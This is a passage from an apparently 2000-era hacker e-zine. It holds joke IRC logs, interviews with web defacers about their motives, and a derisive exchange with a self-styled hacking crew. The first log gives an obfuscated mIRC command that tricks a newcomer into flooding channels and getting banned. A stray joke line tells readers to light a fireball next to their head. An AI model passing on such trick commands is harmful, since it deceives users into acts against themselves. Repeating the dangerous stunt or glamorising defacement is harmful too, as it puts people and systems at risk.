experience where the FBI has shown no interest in providing assistance, the FBI can expect a similar attitude from the information security engineer in the future. @HWA 320.0 [HWA] Silly IRC logs for your amusement and edufication ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The case of the mad AOL hax0r. #HWA.hax0r.news [01:16am] *** Joins: CRASH_N_B (CRASnBURN@ACA9189E.ipt.aol.com) [01:17am] ne hackers here???????? [01:17am] why? [01:17am] na this is a cooking chan [01:17am] cooking? I though it was a sex chan, shit [01:17am] oh i need help hacking [01:18am] *** HWA sets mode: +o paluka [01:18am] what do you need help with? [01:18am] you got it wrong .. its nude cooking [01:18am] LOL [01:18am] phant u a hacker? [01:19am] don't use the deep fryer naked, that hurts [01:19am] r u a hacker???? [01:19am] define hacker [01:19am] computer hacker [01:19am] heh [01:19am] great definition [01:20am] lol [01:20am] one question [01:20am] like playing hacky sac with a computer? [01:20am] wtf u using aol? [01:20am] AOL's leet, duh! [01:20am] guilty [01:21am] Crash, what do you need help with? [01:21am] hacking a site [01:21am] u mean defacing? [01:21am] or hacking it with an axe? [01:23am] de facing [01:23am] thats not hacking [01:23am] atleast not under my definition [01:23am] is their a reason to deface it? [01:23am] i just want to do it [01:24am] well their needs to be a reason behind it [01:24am] it give you modivation [01:24am] because it's bob.com [01:24am] and your name is bob? [01:24am] i'm obbsessed wit the name bob [01:25am] *** Joins: Stigma (starman@xxxxxxxxx32.esatxxxx.xx) [01:25am] no mmy monkey's name is bob [01:25am] *** sAs sets mode: +o Stigma [01:25am] what the hell u gonna do when u deface it [01:26am] say I'm CRASH_N_B, and i'm 31337? [01:26am] i dunno [01:26am] 31337? [01:26am] great [01:26am] crash u know what unix is? [01:26am] or nt? [01:27am] yea! [01:27am] what is it? [01:27am] *** Joins: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net) [01:27am] it's program [01:28am] great topic :P [01:28am] *** Parts: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net) [01:28am] that should go in the mag [01:28am] Crash copy and paste this in mirc /timer 0 0 $left(America,3) $right(tennis,2) $left(golden,1) $+ $left(another,1) $+ $left(yawn,1) [01:28am] can you help me do it?????? [01:29am] where do i past it? [01:29am] in the place where you type [01:29am] on the status screen [01:29am] or here if u want [01:29am] ok [01:29am] how do i copy it ain't workin [01:30am] put your cursor at the first / and move down to the end [01:30am] it copies by its self, so after that push shift insert [01:30am] * CRASH_N_B is gay [01:30am] * CRASH_N_B is gay [01:30am] * CRASH_N_B is gay [01:30am] * CRASH_N_B is gay [01:30am] * CRASH_N_B is gay [01:30am] *** \t sets mode: +b *!*CRASnBURN@*.aol.com [01:30am] *** CRASH_N_B was kicked by \t (CTCP flooder) [01:30am] hahahahahahaq [01:30am] hah [01:30am] *** Joins: base2op (deadmaker@ppp81.xxxxxx.net) [01:30am] didn't think id get to use that so soon :) 321.0 [HWA] The strange case of Cruci's birthday dog ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ok i was real tired and hopped up on goofballs and didnt want to destroy my poo-chi by Tiger box coz its collectable if i dont destroy it. So this is the fun and games from that early morning session. A personal wacky side i don't often show laugh it up, i know it looks g4y but i'm secure tnx. Have fun...;) - Cruci #HWA.X.X [05:43am] I got a robot doggy for my birthday!!#!#@ [05:43am] heh [05:43am] just what i wanted [05:43am] lol [05:43am] <[Zucco]> man perlipc [05:43am] did your daddy get you a prostitute? [05:43am] <[Zucco]> :) [05:43am] haha [05:43am] i wish [05:43am] a what cruci ? [05:43am] you got a dog ? [05:44am] hahaha [05:44am] nice log [05:44am] thank :) [05:45am] haha [05:45am] heh [05:46am] poo-chi [05:46am] shit [05:46am] installation of batteries should [05:46am] be done by an adult [05:46am] hrm [05:46am] guess i can do it eh? [05:46am] hehe [05:47am] guess so [05:47am] have you seen these things? [05:47am] by the furby people [05:47am] lemme see if i can find it on the net [05:47am] I think i've seen a comercial [05:47am] 3 girls wearing stuff no one else in the world would wear petting the dogs [05:48am] www.tigertoys.com [05:48am] their nothing like taking a piss in the backyear at 5:50 in the morning [05:49am] lol [05:49am] trying to figure out how to open the box [05:49am] :-/ [05:49am] pull out the flap [05:50am] i need an exploit [05:50am] wonder if hack.co.za has one [05:50am] fuck get a knife and stab the box to death [05:50am] lol [05:50am] www.tigertoys.com/home.html [05:50am] try satans-army.co.uk [05:50am] the box [05:50am] rofl [05:50am] you stil haven't gotten the box open yet [05:50am] nope [05:51am] lol [05:51am] how the fuck [05:51am] god, I sure hope they didn't wrap it, or else it would of taken you a while to get that off [05:51am] i'm almost in [05:51am] lol [05:51am] i did that earlier [05:51am] how long did it take? [05:51am] aha! [05:52am] sticky tape [05:52am] * PhantasmP claps [05:52am] wait, you said haven't opened it yet? [05:52am] no [05:52am] * PhantasmP takes back the claps [05:52am] shit [05:53am] * PhantasmP cheers on Cruci [05:53am] ok [05:53am] i'm in [05:53am] Good work! [05:53am] oh fuck [05:53am] now its like stuck to some inside cardboard thing [05:53am] with twist ties? [05:53am] i dont see any [05:53am] i might have to take pictures and post it on the site [05:54am] you definatly have to! [05:54am] oh [05:54am] you have to rip apart the handle [05:54am] hook it up to your comptuer and let everyone control it from their home [05:54am] shit, nm, i'm an idiot [05:55am] what the fuck [05:55am] i'm taking a rest [05:56am] give it to your parents they'll have it out in no time [05:56am] heh [05:56am] i don't wanna break the box see [05:56am] i still have the original furby box too [05:56am] =) [05:56am] So do I :) [05:56am] well furby baby, cause they didnt' have any of the other ones [05:57am] man [05:57am] owning a gov auth NS is easier than this [05:57am] :) [05:57am] do you think it comes nutard/spaided? [05:58am] do you know how much ~ it cost? [05:59am] no [05:59am] $50? [05:59am] fuck, I got a real dog for $60 [05:59am] haha [05:59am] guh! [05:59am] furby babies!# [06:00am] hehe [06:00am] yes i'm 35 and i like furbies ok [06:00am] heh [06:00am] yes its fine [06:01am] umm how come I was thinking you were 35 before you said that? [06:01am] tnx [06:01am] hehe [06:01am] heh [06:01am] PhantasmP [06:01am] did you put your age somewhere? [06:01am] i cant open this box [06:01am] yeh [06:01am] actually [06:01am] i'm 36 now [06:01am] but we'll keep it at 35 [06:01am] k? [06:01am] no prob, its only 6 hours into a new day [06:02am] age 4+ [06:02am] how the fuck would a 4 yr old handle this [06:02am] hrm [06:02am] they'd have their parents do it [06:02am] they're asleep [06:02am] ok [06:03am] i'm gonna get my switchblade [06:03am] and cut the twist ties [06:03am] wake them up, and act all excited like your 4 on christmas morning [06:03am] actually FProphet and Dicentra got me this [06:04am] my bro and his fiancee [06:04am] maybe they tampered with it to make it hard for you to open [06:04am] thats what i'm thinking [06:04am] its like that movie 'the game' [06:04am] and this is my game [06:04am] but it wouldn't be worth it if they wern't they to see you struggle [06:04am] brb [06:05am] i have this feeling someone is logging this [06:06am] its 6:13am and the box is open but the dog is still inside [06:06am] i [06:06am] ll keep u posted [06:06am] if you need moral support, i'll be here [06:06am] cant find my knife [06:06am] shit, it stinks outside [06:07am] * Cruciphux rests again [06:08am] how come furby babies you have to be 6+ and the dog is 4+ [06:09am] *** Quits: Oj1st (Ping timeout: 180 seconds) [06:10am] furby looks scary [06:13am] furby checkout http://20x.x8x.231.41/ again [06:13am] err Cruci I mean [06:13am] if you have time [06:16am] 6:24am [06:16am] its out [06:16am] * PhantasmP claps 322.0 [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ - Session Start - (EDITED SLIGHTLY) -] (c) 2000 by PhantasmP of HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Mailto: media@hwa-security.net Thanks to: Herbless for replying back with the answers so quickly and raist & I0wnzz([n]crypt) for providing the first 3 questions. http://hwa-security.net - #hwa-security on EFNet >1. How did you get started in defacing? I've always been a computer geek, and I was playing with security vulnerabilities and other peoples networks, when I thought "hey, I could use this to spread my thoughts around". I've usually got something to say on most subjects and felt that I could use this new technology to spread my thoughts around. It would appear to have started something akin to a cult following. >2. Whats the reasoning behind your defacements? I have various reasons, most of which are apparent on the websites I deface. In the past I've posted messages and info on DeCSS, smoking and government hypocrisy and most recently, I've supported the fuel protests in Britain. I do these things because I believe in them; I think they are right. In the future, I may do something against paedophilia and also rascism because these are blights of the human mind and should be stamped out. Ignorance is no excuse for persecution. >3. Why do you do high risk defacements? High risk sites comes with a high profile - they get my message to the masses. Of course, it could be that I enjoy the attention at a distance... kind of infamous, but anonymous. I suppose there is a perverse kind of satisfaction to that. >4. Were you expecting the amount of media coverage that your getting? Ha ha. No. It's come as a complete surprise. However, That means that I just have to be careful what subjects I choose to speak about - if I target the message to the media and hence the people, it could help the causes that I believe in. In this case, the governments stance on petrol tax and the protestors associated with it. >5. Do you think having that media coverage is helping your "cause"? It's hard to be objective about it. At the very least, I have seen only one negative story about my defacements (although of course here may be more). Also, I've had such an incredible response from the public - not just geeks and hackers - that I believe the media coverage has indeed helped. >6. Do you feel that too many people deface for wrong/dumb reasons? Definately. Most people (read: kids) deface for no other reason than to spread their name across any site they can. The pick irrelevant sites, post badly spelled pages, use abusive and offensive language and generally get on my tits. Why? Because of the few that actually have a talent and understand the principles behind system hacking/cracking, the majority seem to waste their hard-earned skills on "3l33t h4x0r sp34k" and sending "fuck-yous" to people that "d1sr3sp3t th3!r 5h!t". Bah. Tossers. They could use their skills to protest about things they believe in, using what I believe is a legitimate form of protest. Of course, there are a few exceptions to this rule; G-Force Pakistan for one - they are against the violence and murder in Kashmir and deserve more publicity than I, for their cause is to awaken the world to pain, torture, rape, murder and suffering that is being ignored by the western world. >7. How do you feel your defacements are different? For the most part, they are well thought-out and have a definate purpose. I also try to ensure correct spelling and good grammar. Most defacements ignore these basic principles, giving the impression of stupidity on the part of the cracker. >8. Do you have any role models in the "underground" community? I have no role models in any community. I respect some people (for example, Bruce Schneier, the L0pht and to a lesser extent, G-Force who lower their image by using racist slurs), but certainly don't base my actions around those of another. I would like to think I am original and different from the mainstream. >9. Do you ever worry about getting arrested? Yes. I really don't fancy sharing a cell with a big homo called Bubba. I take sensible precautions to avoid getting caught, although if law-enforcement is determined to catch me they will. This is because contrary to popular opinion, they are bigger, collectively smarter and have more resources than I. I know that for every site I deface I increase my chances of getting caught, and try to cover my tracks as much as possible. Sometime soon I will have to stop for good, become a good grey-hat kinda guy and behave myself, or I'm going to be facing a few years care of her Majesty the Queen. ===== Old programmers never die. They just terminate and stay resident. http://phantasm.8m.com [END] @HWA 323.0 [HWA] Interview with Pimpshiz in limelight recently by SugarKing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an interview with 'pimpshiz' who reportedly defaced over 60 sites in a pro-napster social disobedience action. The cracker has been in mainstream media and mentioned on HNN, SugarKing was able to get this interview for your enlightenment and edification, enjoy - Cruci. (c) 2000 by SugarKing/HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks Cruciphux/HWA Mailto: media@hwa-security.net [ - Session Start - (EDITED SLIGHTLY) -] SugarKing: getting quite the media attention eh? Pimpshiz: why do you say that SugarKing: haha, don't you read HNN? Pimpshiz: no SugarKing: well you're on alot Pimpshiz: oh lol Pimpshiz: yeah but that intern talks shit Pimpshiz: pyle or whatever SugarKing: APB News did an article on you SugarKing: are you really an 11 year-old? Pimpshiz: no lol SugarKing: lol yeah I figured that SugarKing: you shouldn't of left your aol account on your defacements Pimpshiz: too late SugarKing: yep SugarKing: you're gonna get busted dude, heh SugarKing: by doing that Pimpshiz: maybe SugarKing: maybe if they don't wish to pursue you, but if they want to they are gonna get you Pimpshiz: yeah SugarKing: i haven't seen you deface lately, all done? Pimpshiz: yeah, for the time being SugarKing: good idea Pimpshiz: hheheehe SugarKing: As if the pro-Napster defacements of random web sites weren't silly enough already, there's a new twist in the case. The individual who claims responsibility for the attacks (a.k.a. Pimpshiz -- now also claiming to be an 11 year-old girl) warns officials that his/her/its arrest will lead to revenge attacks by his/her/its buddies. If the threats have any truth to them, they will only lead to more charges against the vandal. SugarKing: heh SugarKing: http://www.apbnews.com/newscenter/breakingnews/2000/ 08/18/hacker0818_01.html SugarKing: there's one story on you Pimpshiz: i already read that Pimpshiz: got anymore? SugarKing: lemme look Pimpshiz: k SugarKing: http://dailynews.yahoo.com/h/zd/20000817/tc/napster_fan_ hacks_dozens_of_sites_2.html Pimpshiz: got it Pimpshiz: same as the apbnews one isnt it SugarKing: not really SugarKing: they say similiar things, but different site and article Pimpshiz: any others? SugarKing: hmm no Pimpshiz: k Pimpshiz: someone found a CNN one on me yesterday SugarKing: oh Pimpshiz: pcworld, computerworld Pimpshiz: zdnet Pimpshiz: internet.com wants to interview me on their radio station today SugarKing: and are you going to? Pimpshiz: not sure yet SugarKing: honestly, I wouldn't SugarKing: unless you plan on telling them your done defacing Pimpshiz: yeah, dunno cus what if they ask me somethin unexpected that i cant answer SugarKing: yeah that too Pimpshiz: but then again Pimpshiz: it'd be just tite Pimpshiz: to give shouts at the end SugarKing: hahah, it's gonna be tight when your ass is caught by the FBI Pimpshiz: hehehe yeah Pimpshiz: ill be like "yo lemme get shouts to my boys in the west, RSH, hackweiser, the FBI, the CIA, the NIPC" Pimpshiz: ;x SugarKing: haha SugarKing: i've never heard of you till this napster thing, your obviously new to the scene Pimpshiz: what scene Pimpshiz: defacing scene? SugarKing: yeah Pimpshiz: lol Pimpshiz: yeah, but to everything else im from 95 Pimpshiz: been programming since 96 SugarKing: oh so you program? Pimpshiz: lol yes Pimpshiz: im certified professional in like 6 things SugarKing: so you're not just another NT kiddie? Pimpshiz: id show you my online transcript but it has my personal info Pimpshiz: and no Pimpshiz: lol Pimpshiz: i guess not SugarKing: 11 year-old girl, lol....so your not in your teens either I imagine? Pimpshiz: im 16 Pimpshiz: not 11 Pimpshiz: and im a guy SugarKing: hahah i figured that SugarKing: i don't think an 11 year-old girl can hack nasa Pimpshiz: hehehe SugarKing: He wrote in a series of e-mails to ZDNet News that hacking the sites was easy and he was able to exploit "obvious" holes. SugarKing: what did you exploit anyways? Pimpshiz: hahaha that was a lie Pimpshiz: i didnt write that shit SugarKing: haha Pimpshiz: thats hellllllllla funny Pimpshiz: cus it sure as fuck was not easy rofl SugarKing: i don't think it was a common hole anyways SugarKing: yeah i would figure that Pimpshiz: its undocumented SugarKing: you find it yourself? SugarKing: the hole Pimpshiz: yeah SugarKing: cool SugarKing: The alleged hacktivist who may have defaced as many as 60 Web sites in the past week with a Pro-Napster screed now warns that fellow hackers will unleash widespread cyberattacks if federal authorities attempt to collar any suspects. SugarKing: lol you say that one? Pimpshiz: yeah Pimpshiz: but i didnt conspire it Pimpshiz: someone told me and i relayed it SugarKing: ah SugarKing: Ray Kaplan, a computer security consultant at Guardent Inc. in St. Paul, Minn., said the defacements appear to be nothing new or original. It's the same old penetration, he said. You figure out what software people are running, and go find the exploit and take advantage of it. SugarKing: lol Pimpshiz: lol yeah, even microsoft thinks im using the SQL default pw SugarKing: hah SugarKing: so when do you plan on clarifying all these things, own exploit, not 11 year-old, etc Pimpshiz: dunno yet SugarKing666: http://www.hwa-security.net/index0.html mind if I clarify some of it on there? i won't if you don't want to Pimpshiz: yeah go ahead SugarKing: cool thanks SugarKing: what is service is your exploit for? Pimpshiz: cant say Pimpshiz: no details. END (c) 2000 SugarKing/HWA-Security @HWA 324.0 [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I know its a waste of space but it belongs here nontheless. They can get off in knowing their silliness made it into the zine as promised =) Prelude This "interview" was requested by members of DeC. It is one of the most elite I have ever done or seen, it surely makes groups like ADM look completely lame. Done Tuesday Aug 1st 2000. A date to remember indeed I refrained from adding commentary although it was tempting, I think the text speaks for itself. Enjoy! ---START--- ůíů Value of LOG set to ON y0d00d you guys both DeC? so what's up with this interview? y4h i WANT TO EXPLAIN MY MOTIVES for HACKING didnt say there was one yet :) 000 mode/#intr [+o r00thl3ss] by blame_ AHYO watchit with those smily facez but go ahead and make your statement 0k l1ke eat me heh i hack not for knowledge but POWER ok not to learn but to DESTROY to CONTROl CONTROL i agree what have you hacked d00d coz I never heard of you what have I HACKED? WHAT HAVENT WE HACKED sti.amwe.qow.ei.pan.gov.au for ONE THING MISTER yeah you dont need to be specific oh shyt 0kd00d why the attitude? it makes you seem lame why should poeple come forth about that they've hacked are you for real? y4h well. we're the real deal remember when prohosting.com got rm'd a few years ago yeh ? you guys? ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | r00thl3ss (ruthless@???????.gti.net) (Internic Network) ł ircname : blast blast & leave my gang rag layin on ur face | channels : @#intr ł server : irc.mcs.net (MCSNet Services - (312)803-MCS1) : idle : 0 hours 0 mins 12 secs (signon: Tue Aug 1 14:35:30 2000) th3thtth4t w4z y0!@ ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | blame_ (lurk@???????.gti.net) (Internic Network) ł ircname : lock ur windowz, close ur doorz | channels : @#intr ł server : irc.idle.net (Phoenix Rising) : idle : 0 hours 0 mins 5 secs (signon: Tue Aug 1 11:37:42 2000) ermM n0 c0mM3nt 0h y4h i m34n fair nuff heh l1ke was it provoked? 1t w4z s0m30ne elze my lawyer has directed me 2 not say anything incrimin8ng y3z so you said you wanted an interview what do you want to say? w3 g0 w4y b4ck w1th th3 adm1n you're new...how new? he was mad cuz we shut off his fonez acouple times he started runn1ng hiz m0uth 0ff 4nd u kn0w how things are why was he mad at ya? p34ple wh0 p0p sh1t get rm'D SHHH !!! heh i m34n l1ke y4h f0rg3t th4t yah el8 speak can not be used as evidence in court from what i understand anyway so how many people in this group? just you two? so dont worry d00d! 0h y4h s0 anywayz i dont narq man h0w ab0ut th4t intrv1ew d00d? thought we were attempting one now *g* we're el8 and sh1t yah we r how old are ya? how many members? ill say hell0? 000 NetSplit: irc.etsmtl.ca split from irc.total.net [04:11pm] ůíů BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc.etsmtl.ca] u there br0? CrUCIpHix?? Cruciphux where you located? U.S? [ctcp(#intr)] PING y0d00d by not responding, you're disrespecting uz and as u can see th4t'z n0t wh4t u w4nn4b3 d01nG buDDY ib cable bloc sync dropped its shit actually dude uHh 50 at the m0m3nt 000 CTCP PING reply from r00thl3ss: 47.678 seconds y3z all 0ver the w0rld im also an op in one of the most PRESTEGIOUS UNDERGROUND IRC CHANNELS #phrack ! i've asked a bunch of questions and you guys didn't answer don't blame me the net is fux0red ok y4h that t00 curr3ntly so answer the questions how long ya been around? [ctcp(#intr)] PING we h4v3 m3mb3rz fr0m all 0ver the w0rld each m3mber has their 0wn t4l3nt f0r ex4mpl3 maybe we should reschedule this i keep dropping out unless you're packetting which i assume not [ctcp(#intr)] PING r00thl3ss, can build a blueb0x like no oth3r y0 do u kn0w whut a blueb0x iz? ye$ cuz i c4n expl41n f0r the r34d3rz hell0? wh0a guys i keep dropping out hahaha [ctcp(#intr)] PING hes in #velcro thats like the wannabe BoW chan i was invited n0 it'z n0t no idea what its about 000 CTCP PING reply from r00thl3ss: 139.547 seconds 000 CTCP PING reply from r00thl3ss: 130.332 seconds ctcp ping replies are 130-139 seconds .. this is pointless IRC log ended Tue Aug 1 16:18:46 2000 ůíů Starting logfile IrcLog IRC log started Tue Aug 1 16:19:33 2000 ůíů Value of LOG set to ON ůíů Cruciphux [hwa@hwa-security.net] has joined #intr ůíů ServerMode/#intr [+nt] by irc.mcs.net ůíů [Users(#intr:1)] [@Cruciphux ] ůíů Channel #intr was created at Tue Aug 1 16:27:07 2000 ůíů BitchX: Join to #intr was synced in 2.266 secs!! ůíů Cruciphux [hwa@hwa-security.net] has left #intr [] ůíů Cruciphux [hwa@hwa-security.net] has joined #phrack ůíů [Users(#phrack:71)] [ Cruciphux ] [ gweeds ] [ cvx ] [ suid ] [ dnm ] [ TheHated ] [ deb ] [ hegemoOn ] [ jennicide ] [ sl0ppy ] [ live_ ] [ cripto ] [ _angus ] [ MeGaMaCk ] [ phatal ] [ r00thl3ss ] [ prym ] [ sq- ] [ xdm ] [ Kore_Dump ] [ py- ] [ phidias ] [ diphen ] [ PRIAPUS ] [ Yowie ] [ loki ] [ _jerky ] [ oghost ] [ bnd ] [ ajx ] [ _xyg_ ] [ blame_ ] [ SN ] [ awr ] [ kemo ] [ FrontLine ] [ kaotik ] [ dank ] [ plaguez ] [ falken ] [ epic^ ] [ devstderr ] [ spinux ] [ silitek ] [ Sens ] [ eric ] [ no_ana ] [ rufus ] [vpea ] [ segmond ] [ cleb ] [ sub ] [ z3nz ] [ dreck ] [ ju1ce_ ] [ deathinc_ ] [ suave ] [ Neural ] [ Trinity93 ] [ arch ] [ f_jail ] [ Dodger ] [ e10k ] [ interline ] [ arakis_ ] [ Swern ] [ ju1ce- ] [ incr ] [ tyme ] [ n00dle ] [ wilkins ] ůíů [Users(#phrack:21)] [ Veerappan ] [ casret ] [ chriz ] [ kn0wfx ] [ ret- ] [ pm- ] [ ksoze ] [ m4g1c ] [ capnlunch ] [ sh1fty ] [ felix ] [ _GNU_ ] [ Codiak ] [ str8niga ] [ ^2muchSun ] [ codemonky ] [ maam0gr4m ] [ woyzeck ] [ NNY ] [ alia ] [ ii ] ůíů Channel #phrack was created at Thu Jul 13 15:49:35 2000 ůíů BitchX: Join to #phrack was synced in 2.306 secs!! yo i'm lagged to fuck These next couple steps need to be done very rapidly. Open the grill lid, stick your head into the grill and light your lighter right next to your head. The result will be a very fast burning fireball that will burn all of the hair off of your head. they dotn call me butternuts jsut because i like to dip my balls in butter... this web page rules [msg(blame_)] go back to #intr for a sec ůíů Cruciphux [hwa@hwa-security.net] has left #phrack [] ůíů Cruciphux [hwa@hwa-security.net] has joined #intr ůíů ServerMode/#intr [+nt] by irc.mcs.net ůíů [Users(#intr:1)] [@Cruciphux ] ůíů Channel #intr was created at Tue Aug 1 16:28:33 2000 ůíů BitchX: Join to #intr was synced in 2.246 secs!! ůíů Topic (#intr): changed by Cruciphux: lagged to fuck lets reschedule ůíů blame_ [lurk@????????.gti.net] has joined #intr ůíů suave [g@?????ST.net] has joined #intr sup y0d00dz i'm lagged to fuck yo lets reschedule i brought my bro suave sup blame he's DEC word not much dude DeC4life w0rD y0 so how about th1 interv13w y0? erm th1z i'm lagged to fuck lets reschedule are you seeing this hm look dude yes i'm kinda preessed for time wanna do email? get on another machine & do it bro cant gimme a ime i'll see if i can fit it into m schedule my ok what kinda questions r u gonna ask do u have a fone # i can reach u @? you give me a time if you're pressed no email? ůíů r00thl3ss [ruthless@???????.gti.net] has joined #intr naw i d0nt d0 em41l y0 sup r00thl3ss yo d00D whats the dealeo you have no anonymous email? i keep dropping out my cable is shit email is not sekure! uh ya i was getting ping times of 139 seconds ya not with carnivore around man did u hear aobut that shit i refuse to use email, the government could be watching yah u n3v3r kn0w i heard about it on the radio like they dont sniff efnet? n.p.r. ha lets try this while i'm online ůíů [Users(#intr:4)] [ r00thl3ss ] [ suave ] [ blame_ ] [@Cruciphux ] 0k s0undz g00d ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | r00thl3ss (ruthless@????????.gti.net) (Internic Network) ł ircname : blast blast & leave my gang rag layin on ur face | channels : #intr ł server : irc.mcs.net (MCSNet Services - (312)803-MCS1) : idle : 0 hours 0 mins 28 secs (signon: Tue Aug 1 14:35:30 2000) ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | suave (g@?????ST.net) (Internic Network) ł ircname : gangster of love | channels : #intr ł server : irc.idle.net (Phoenix Rising) : idle : 0 hours 0 mins 44 secs (signon: Mon Jul 31 04:52:20 2000) Ok question 1 is? ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | blame_ (lurk@???????.gti.net) (Internic Network) ł ircname : lock ur windowz, close ur doorz | channels : #intr ł server : irc.idle.net (Phoenix Rising) : idle : 0 hours 0 mins 9 secs (signon: Tue Aug 1 11:37:42 2000) how long you guys been around? y0 1m r34dy $ho0t 10 yearz n0w 10 yrs next week and what does DeC stand for? ya i been around 10 years digital electronic crips deadly electronic cripz how many members? yah deadly yah over 50 woah at last count we're like the digital version of the cripz and stuff like 5 th@ r inner circle tho thats bigger than most i'm sure u've heard of the cripz before we have ties 2 the real crips what is your credo? yes & bloods so you're ca? we pull shit 4 them on the net cc? some of us r y4h but you hack too ya some defacing? y4h $ure naw so nothing on attrition ok what do you want to tell people uh well pr3tty much that we're k00l3r th4n u uhhhh oh yah ... and dont fuck with uz ok or we'll rm u suave we r in2 way more hardcore shit than defacing dude sup do u have anything to add yo? ya back the fuck up b4 u get slapped the fuck up ok back back the fuck up b4 u get hacked the fuck up well I don't know what to ask you guys to be honest if you're into shit you don't want to talk about its difficult to ask questions... im in2 girls so you guys just talk away me 2 lol chicks say i look gr8 in blue you do shit offline? $ure phreaking? i look gr8 in all colours yah phreak1ng yah im a major field phreaker we're bad ass own any switches? no comment! u mean like beige boxing ha ya 4 sure beige boxing is fucking lame switches what r those r00thl3ss is pretty wiacked with a beige box i have a blotto box erm wicked you're into phreaking and dunno what a switch is? yah i am you're pulling my leg those thingz are cool whats a dms 250 oh shiyt ok i remember now hmm i dunno w8 dms? wtf is that? whats a blue box? a dms 250 is a switch what does dropping a card mean? 4 phones & shit a dms250 is a tandem switch? what tone seizes a trunk? blueboxes get u free calls thats where u drop a CC on irc 2stealk0d3z 2600 2600hz 2400+2600 under c5 u can do it w/.a rice krispies whistle 26000 under r1 erm 2600 only on switches not on the SS7 network! ala cap'n krunch right oh ya capn crunch been a while since i phreaked bro crucphix u know 5ess? do you phreak for 'business' or fun haha! crucphix iz lame! its cruciphux im really in2 unix cruciphix fun & prophet! you're lame ůíů Cruciphux [hwa@hwa-security.net] has left #intr [] ůíů BitchX: You are now talking to channel #hwa.hax0r.news >>> blame_ Invites You to #intr ůíů BitchX: Press Ctrl-K to join #intr ůíů Cruciphux [hwa@hwa-security.net] has joined #intr ůíů Topic (#intr): lagged to fuck lets reschedule ůíů Topic (#intr): set by Cruciphux at Tue Aug 1 16:28:55 2000 ůíů [Users(#intr:4)] [ Cruciphux ] [ r00thl3ss ] [ suave ] [ blame_ ] ůíů Channel #intr was created at Tue Aug 1 16:28:33 2000 ůíů BitchX: Join to #intr was synced in 2.240 secs!! yo sup bro y0 cruciphux y0d00d you gonna be serious? what's up sure yah i was being serious dude or am i wasting my time ya blme_ wasnt but hes a goofball im always serious so what are you into tell me the scoop man im in2 unix blames a bong tokin alcoholic so forgive him yah i know unix too DoSing? the ins & outs or pure owning? im in2 net shit & sometimes i cruise the X.25 highway nah i said unix not DOS how many shells you got depends how im feelin y u wanna trade DoS - denial of service no oh u mean DoS i'm legit now yeh i got some virgin T3's that r eggable oic i have tons of shells pure owning thats kewl man every1 ends up legit u know do you have like a tfn net or shit once u reach that level of elitness and u just plateau a tfn net? ok earlier i asked how old you are generally we have many tribe flood network im 29 i have hundreds of t3's on my tfn its distributed denial of service i use tfn2k tho bro its got more features ohyah what about tfn3000 we at DeC are all about tfn2k heh cruciphux are u in2 fones dude? used to be u ever hack a switch? but i'm supposed to be interviewing you ha sounds like a no 2 me oh ok well u know MoD? if you're gonna act like dorks and not answer questions im in MoD/LoD then what the fuck am I doing here? so's blame & suave yah this is incredibly lame actually only im in LoD but we're all in MoD uh y you seem to know shit you've told me nothing dont answer questions whut do u wanna know? and want me to print this? ask me something technical about switches! you're ops in #phrack? just be like yah of course we're ops in #phrack you said before you didnt know what a switch or dms was lol you said thats like beige boxing right i was kidding 2nd chance! cruciphux sup well tell me something heh "DeC - super-underground, fuck with them & get rmd" E0F thats it? ok i'll publish that any props? ok so lets talk about shells ya props 2 me & my crew (Dec) yaaah uhhh ok disses? ;) yah PHRACK everybody disses 2 phrack gH everybody especially PHRACK you guys do drugs? phrack HWA keelber elves sSH all those lam0rz yah sure im str8 edge props 2 Rootshell Hackers from blame btw yah disses to HWA ya im sXe too actually anything else? scratch that propz to the rSH # # #### # # ###### # # # # #### # ##### # # # # oh yah be like "HWA iz gay" "DeC is gr8" ... that all? # # # # # #### # # ###### # # # # ## # # # # # # ###### # # # # yah sure ok tnx crucipheux also make sure u mention this # # # ## # ###### # # ## ## # # # # # # # # # #### # # this was quite the interview aempire is a fag # #### # # # # # # #### man do ui have any more q's 4 me about shells or beige oxingh im willing 2 answer nething #### ## # # # # # # # # # # # # # ### ###### # # # # # # did you guys come from AOL originally? you like scrolling #### # # # haaha cruciSUX disses to cruciphux yah quiz us i did! lol aol is for lamers so is scrolling oh shyT misfire i didnt really! aol is all lamers dude lol i got kicked off aol for aolhell GAY-OL HAhA k tnx for nothin me 2 dude! ůíů Cruciphux [hwa@hwa-security.net] has left #intr [] [suave(g@U????T.net)] yo whens the interview gonn a be released [msg(suave)] lol [msg(suave)] next issue [msg(suave)] should be a smash hit [suave(g@U????T.net)] awesome man it was agr8 interview i feel agood about it and it was kewl meeting u [msg(suave)] heh ok man [msg(suave)] it was funny [msg(suave)] cheers [suave(g@U????T.net)] whens it coming out btw [msg(suave)] not sure i'm kinda busy [suave(g@U?????T.net)] ok bro let us know k [msg(suave)] sure unbelievable 